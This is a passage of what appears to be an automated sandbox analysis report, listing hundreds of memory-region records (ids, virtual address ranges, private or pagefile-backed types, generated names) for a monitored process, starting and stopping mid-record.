0x6670000 end_va = 0x67e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2967 start_va = 0x6db0000 end_va = 0x6f29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2968 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 2970 start_va = 0x6670000 end_va = 0x67ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2971 start_va = 0x6db0000 end_va = 0x6f2efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2972 start_va = 0x6670000 end_va = 0x67f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2973 start_va = 0x6db0000 end_va = 0x6f33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2974 start_va = 0x6670000 end_va = 0x67f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2975 start_va = 0x6db0000 end_va = 0x6f38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2976 start_va = 0x6670000 end_va = 0x67fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2977 start_va = 0x6db0000 end_va = 0x6f3dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2978 start_va = 0x6670000 end_va = 0x6800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2979 start_va = 0x6db0000 end_va = 0x6f42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2980 start_va = 0x6670000 end_va = 0x6805fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2981 start_va = 0x6db0000 end_va = 0x6f47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2984 start_va = 0x6670000 end_va = 0x680afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2985 start_va = 0x6db0000 end_va = 0x6f4cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2986 start_va = 0x6670000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006670000" filename = "" Region: id = 2987 start_va = 0x6db0000 end_va = 0x6f51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2989 start_va = 0x7310000 end_va = 0x74b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 2990 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 2991 start_va = 0x6db0000 end_va = 0x6f56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2992 start_va = 0x7310000 end_va = 0x74b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 2993 start_va = 0x6db0000 end_va = 0x6f5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2994 start_va = 0x7310000 end_va = 0x74befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 2995 start_va = 0x6db0000 end_va = 0x6f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2997 start_va = 0x7310000 end_va = 0x74c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 2998 start_va = 0x6db0000 end_va = 0x6f65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 2999 start_va = 0x7310000 end_va = 0x74c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3000 start_va = 0x6db0000 end_va = 0x6f6afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3001 start_va = 0x7310000 end_va = 0x74cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3002 start_va = 0x6db0000 end_va = 0x6f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3003 start_va = 0x7310000 end_va = 0x74d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3004 start_va = 0x6db0000 end_va = 0x6f74fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3005 start_va = 0x7310000 end_va = 0x74d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3006 start_va = 0x6db0000 end_va = 0x6f79fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3007 start_va = 0x7310000 end_va = 0x74dcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3009 start_va = 0x6db0000 end_va = 0x6f7efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3010 start_va = 0x7310000 end_va = 0x74e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3011 start_va = 0x6db0000 end_va = 0x6f83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3012 start_va = 0x7310000 end_va = 0x74e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3013 start_va = 0x6db0000 end_va = 0x6f88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3014 start_va = 0x7310000 end_va = 0x74ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3015 start_va = 0x6db0000 end_va = 0x6f8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3016 start_va = 0x7310000 end_va = 0x74f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3017 start_va = 0x6db0000 end_va = 0x6f92fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3018 start_va = 0x7310000 end_va = 0x74f5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3019 start_va = 0x6db0000 end_va = 0x6f97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3020 start_va = 0x7310000 end_va = 0x74fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3024 start_va = 0x6db0000 end_va = 0x6f9cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3025 start_va = 0x7310000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3026 start_va = 0x6db0000 end_va = 0x6fa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3027 start_va = 0x7310000 end_va = 0x7504fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3028 start_va = 0x6db0000 end_va = 0x6fa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3029 start_va = 0x7310000 end_va = 0x7509fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3043 start_va = 0x6db0000 end_va = 0x6fabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3058 start_va = 0x7310000 end_va = 0x750efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3073 start_va = 0x6db0000 end_va = 0x6fb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3088 start_va = 0x7310000 end_va = 0x7513fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3104 start_va = 0x6db0000 end_va = 0x6fb5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3117 start_va = 0x7310000 end_va = 0x7518fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3150 start_va = 0x6db0000 end_va = 0x6fbafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3153 start_va = 0x7310000 end_va = 0x751dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3192 start_va = 0x6db0000 end_va = 0x6fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3219 start_va = 0x7310000 end_va = 0x7522fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3235 start_va = 0x6db0000 end_va = 0x6fc4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3246 start_va = 0x7310000 end_va = 0x7527fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3275 start_va = 0x6db0000 end_va = 0x6fc9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3286 start_va = 0x7310000 end_va = 0x752cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3302 start_va = 0x6db0000 end_va = 0x6fcefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3315 start_va = 0x7310000 end_va = 0x7531fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3420 start_va = 0x6db0000 end_va = 0x6fd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3449 start_va = 0x7310000 end_va = 0x7536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3478 start_va = 0x6db0000 end_va = 0x6fd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3493 start_va = 0x7310000 end_va = 0x753bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3518 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 3519 start_va = 0x6db0000 end_va = 0x6fddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3520 start_va = 0x7310000 end_va = 0x7540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3521 start_va = 0x6db0000 end_va = 0x6fe2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3522 start_va = 0x7310000 end_va = 0x7545fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3523 start_va = 0x6db0000 end_va = 0x6fe7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3524 start_va = 0x7310000 end_va = 0x754afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3525 start_va = 0x6db0000 end_va = 0x6fecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3526 start_va = 0x7310000 end_va = 0x754ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3528 start_va = 0x6db0000 end_va = 0x6ff1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3529 start_va = 0x7310000 end_va = 0x7554fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3536 start_va = 0x6db0000 end_va = 0x6ff6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3537 start_va = 0x7310000 end_va = 0x7559fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3540 start_va = 0x6db0000 end_va = 0x6ffbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3541 start_va = 0x7310000 end_va = 0x755efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 3542 start_va = 0x6db0000 end_va = 0x7000fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3545 start_va = 0x9c80000 end_va = 0x9ed3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3547 start_va = 0x6db0000 end_va = 0x7005fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3551 start_va = 0x9c80000 end_va = 0x9ed8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3556 start_va = 0x6db0000 end_va = 0x700afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3557 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 3558 start_va = 0x9c80000 end_va = 0x9eddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3560 start_va = 0x6db0000 end_va = 0x700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006db0000" filename = "" Region: id = 3568 start_va = 0x9c80000 end_va = 0x9ee2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3574 start_va = 0x9ef0000 end_va = 0xa154fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 3586 start_va = 0x9c80000 end_va = 0x9ee7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3588 start_va = 0x9ef0000 end_va = 0xa159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 3592 start_va = 0x9c80000 end_va = 0x9eecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3593 start_va = 0x9ef0000 end_va = 0xa15efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ef0000" filename = "" Region: id = 3598 start_va = 0xa160000 end_va = 0xa3d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a160000" filename = "" Region: id = 3602 start_va = 0x9c80000 end_va = 0x9ef3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3604 start_va = 0x9f00000 end_va = 0xa176fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 3611 start_va = 0x9c80000 end_va = 0x9ef8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3622 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 3632 start_va = 0x9f00000 end_va = 0xa17bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 3644 start_va = 0x9c80000 end_va = 0x9efdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3645 start_va = 0x9f00000 end_va = 0xa180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 3652 start_va = 0xa190000 end_va = 0xa412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a190000" filename = "" Region: id = 3667 start_va = 0x9c80000 end_va = 0x9f05fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3668 start_va = 0x9f10000 end_va = 0xa197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 3675 start_va = 0x9c80000 end_va = 0x9f0afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3682 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 3683 start_va = 0x9f10000 end_va = 0xa19cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 3685 start_va = 0x9c80000 end_va = 0x9f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3689 start_va = 0x9f10000 end_va = 0xa1a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f10000" filename = "" Region: id = 3690 start_va = 0xa1b0000 end_va = 0xa444fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1b0000" filename = "" Region: id = 3692 start_va = 0x9c80000 end_va = 0x9f16fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3704 start_va = 0x9f20000 end_va = 0xa1b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 3705 start_va = 0x9c80000 end_va = 0x9f1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3707 start_va = 0x9f20000 end_va = 0xa1befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 3711 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 3712 start_va = 0xa1c0000 end_va = 0xa460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1c0000" filename = "" Region: id = 3713 start_va = 0x9c80000 end_va = 0x9f23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3720 start_va = 0x9f30000 end_va = 0xa1d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 3721 start_va = 0x9c80000 end_va = 0x9f28fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3726 start_va = 0x9f30000 end_va = 0xa1dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 3735 start_va = 0x9c80000 end_va = 0x9f2dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3736 start_va = 0x9f30000 end_va = 0xa1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 3738 start_va = 0xa1e0000 end_va = 0xa492fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1e0000" filename = "" Region: id = 3739 start_va = 0x9c80000 end_va = 0x9f34fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3744 start_va = 0x9f40000 end_va = 0xa1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 3745 start_va = 0x9c80000 end_va = 0x9f39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3747 start_va = 0x9f40000 end_va = 0xa1fcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 3751 start_va = 0x9c80000 end_va = 0x9f3efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3758 start_va = 0x9f40000 end_va = 0xa201fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 3773 start_va = 0xa210000 end_va = 0xa4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a210000" filename = "" Region: id = 3814 start_va = 0x9c80000 end_va = 0x9f46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3839 start_va = 0x9f50000 end_va = 0xa218fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 3858 start_va = 0x9c80000 end_va = 0x9f4bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3882 start_va = 0x9f50000 end_va = 0xa21dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 3905 start_va = 0xa220000 end_va = 0xa4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a220000" filename = "" Region: id = 3927 start_va = 0x9c80000 end_va = 0x9f52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3946 start_va = 0x9f60000 end_va = 0xa235fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 3957 start_va = 0x9c80000 end_va = 0x9f57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 3986 start_va = 0x9f60000 end_va = 0xa23afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 4023 start_va = 0x9c80000 end_va = 0x9f5cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4046 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4047 start_va = 0x9f60000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 4072 start_va = 0xa240000 end_va = 0xa521fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 4097 start_va = 0x9c80000 end_va = 0x9f64fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4138 start_va = 0x9f70000 end_va = 0xa256fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 4153 start_va = 0x9c80000 end_va = 0x9f69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4164 start_va = 0x9f70000 end_va = 0xa25bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 4193 start_va = 0x9c80000 end_va = 0x9f6efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4216 start_va = 0x9f70000 end_va = 0xa260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f70000" filename = "" Region: id = 4241 start_va = 0xa270000 end_va = 0xa563fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a270000" filename = "" Region: id = 4254 start_va = 0x9c80000 end_va = 0x9f75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4266 start_va = 0x9f80000 end_va = 0xa278fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f80000" filename = "" Region: id = 4273 start_va = 0x9c80000 end_va = 0x9f7afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4274 start_va = 0x9f80000 end_va = 0xa27dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f80000" filename = "" Region: id = 4278 start_va = 0x9c80000 end_va = 0x9f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4279 start_va = 0x9f80000 end_va = 0xa282fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f80000" filename = "" Region: id = 4280 start_va = 0xa290000 end_va = 0xa594fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a290000" filename = "" Region: id = 4281 start_va = 0x9c80000 end_va = 0x9f87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4282 start_va = 0x9f90000 end_va = 0xa299fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f90000" filename = "" Region: id = 4283 start_va = 0x9c80000 end_va = 0x9f8cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4284 start_va = 0x9f90000 end_va = 0xa29efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f90000" filename = "" Region: id = 4285 start_va = 0xa2a0000 end_va = 0xa5b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2a0000" filename = "" Region: id = 4286 start_va = 0x9c80000 end_va = 0x9f93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4288 start_va = 0x9fa0000 end_va = 0xa2b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 4289 start_va = 0x9c80000 end_va = 0x9f98fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4290 start_va = 0x9fa0000 end_va = 0xa2bbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 4291 start_va = 0x9c80000 end_va = 0x9f9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4293 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4294 start_va = 0x9fa0000 end_va = 0xa2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 4295 start_va = 0xa2d0000 end_va = 0xa5f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2d0000" filename = "" Region: id = 4297 start_va = 0x9c80000 end_va = 0x9fa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4298 start_va = 0x9fb0000 end_va = 0xa2d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fb0000" filename = "" Region: id = 4299 start_va = 0x9c80000 end_va = 0x9faafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4303 start_va = 0x9fb0000 end_va = 0xa2dcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fb0000" filename = "" Region: id = 4305 start_va = 0x9c80000 end_va = 0x9faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4306 start_va = 0x9fb0000 end_va = 0xa2e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fb0000" filename = "" Region: id = 4307 start_va = 0xa2f0000 end_va = 0xa624fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2f0000" filename = "" Region: id = 4308 start_va = 0x9c80000 end_va = 0x9fb6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4309 start_va = 0x9fc0000 end_va = 0xa2f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fc0000" filename = "" Region: id = 4310 start_va = 0x9c80000 end_va = 0x9fbbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4311 start_va = 0x9fc0000 end_va = 0xa2fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fc0000" filename = "" Region: id = 4312 start_va = 0xa300000 end_va = 0xa640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a300000" filename = "" Region: id = 4317 start_va = 0x9c80000 end_va = 0x9fc3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4320 start_va = 0x2670000 end_va = 0x267dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Region: id = 4321 start_va = 0x9fd0000 end_va = 0xa315fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fd0000" filename = "" Region: id = 4323 start_va = 0x9c80000 end_va = 0x9fc8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4327 start_va = 0x9fd0000 end_va = 0xa31afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fd0000" filename = "" Region: id = 4330 start_va = 0x9c80000 end_va = 0x9fcdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c80000" filename = "" Region: id = 4333 start_va = 0x9fd0000 end_va = 0xa31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fd0000" filename = "" Region: id = 4334 start_va = 0xa320000 end_va = 